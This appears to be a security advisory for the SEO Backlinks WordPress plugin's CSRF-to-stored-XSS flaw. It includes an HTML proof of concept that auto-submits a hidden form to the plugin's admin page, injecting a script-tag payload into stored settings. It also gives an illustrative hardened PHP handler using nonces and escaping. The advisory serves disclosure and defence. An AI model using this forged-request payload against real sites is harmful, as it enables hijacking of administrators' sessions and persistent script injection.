wpexploit Wordfence WPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359
History Jul 28, 2021 - 12:00 a.m.

SEO Backlinks <= 4.0.1 - CSRF to Stored XSS

2021-07-28 00:00:00
Wordfence
116

EPSS: 0.001 (Low)
Percentile: 47.2%

The SEO Backlinks WordPress plugin is vulnerable to Cross-Site Request Forgery via the loc_config function found in the ~/seo-backlinks.php file, which allows attackers to inject arbitrary web scripts, in versions up to and including 4.0.1.

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=loc_menu" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loc_sensitive" value="No" />
<input type="hidden" name="loc_target_blank" value="No" />
<input type="hidden" name="loc_back" value="Yes" />
<input type="hidden" name="key_1" value="&quot;><script>alert(1)</script>" />
<input type="hidden" name="url_1" value="&quot;><script>alert(1)</script>" />
<input type="hidden" name="key_2" value="" />
<input type="hidden" name="url_2" value="" />
<input type="hidden" name="submitted" value="" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm" style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
    let submit = HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</body>
</html>
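
The two controls whose absence this advisory describes, a nonce check on the settings POST and escaping of stored values on output, shown as an added PHP example built on standard WordPress APIs; it is not the plugin's code or its actual patch. The function name, nonce action and field, and option name are assumptions; the form field names are taken from the PoC above.

```php
<?php
// Added example: hypothetical hardened settings handler. loc_config_hardened,
// loc_save_settings, loc_nonce and loc_options_example are placeholder names,
// not the plugin's own identifiers; key_N/url_N/submitted come from the PoC form.

function loc_config_hardened() {
    // Only administrators may view or change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['submitted'] ) ) {
        // CSRF defence: aborts unless the request carries a valid nonce
        // issued for this action to the current user. A cross-site form
        // cannot know this value, so the forged POST is rejected here.
        check_admin_referer( 'loc_save_settings', 'loc_nonce' );

        $pairs = array();
        for ( $i = 1; isset( $_POST[ "key_$i" ], $_POST[ "url_$i" ] ); $i++ ) {
            // Input sanitisation: strip tags from keywords, keep only valid URLs.
            $key = sanitize_text_field( wp_unslash( $_POST[ "key_$i" ] ) );
            $url = esc_url_raw( wp_unslash( $_POST[ "url_$i" ] ) );
            if ( '' !== $key && '' !== $url ) {
                $pairs[] = array( 'key' => $key, 'url' => $url );
            }
        }
        update_option( 'loc_options_example', $pairs );
    }

    // Stored pairs plus one empty row so a new pair can be entered.
    $rows = array_merge( get_option( 'loc_options_example', array() ), array( array( 'key' => '', 'url' => '' ) ) );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'loc_save_settings', 'loc_nonce' ); ?>
        <?php foreach ( $rows as $n => $row ) : ?>
            <!-- Output escaping: a stored value cannot break out of the attribute. -->
            <input type="text" name="key_<?php echo (int) $n + 1; ?>" value="<?php echo esc_attr( $row['key'] ); ?>" />
            <input type="text" name="url_<?php echo (int) $n + 1; ?>" value="<?php echo esc_url( $row['url'] ); ?>" />
        <?php endforeach; ?>
        <input type="hidden" name="submitted" value="" />
        <input type="submit" value="Save" />
    </form>
    <?php
}
```

Either control alone is incomplete: the nonce stops the forged request, while escaping on output keeps any value already stored from executing in the admin page.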
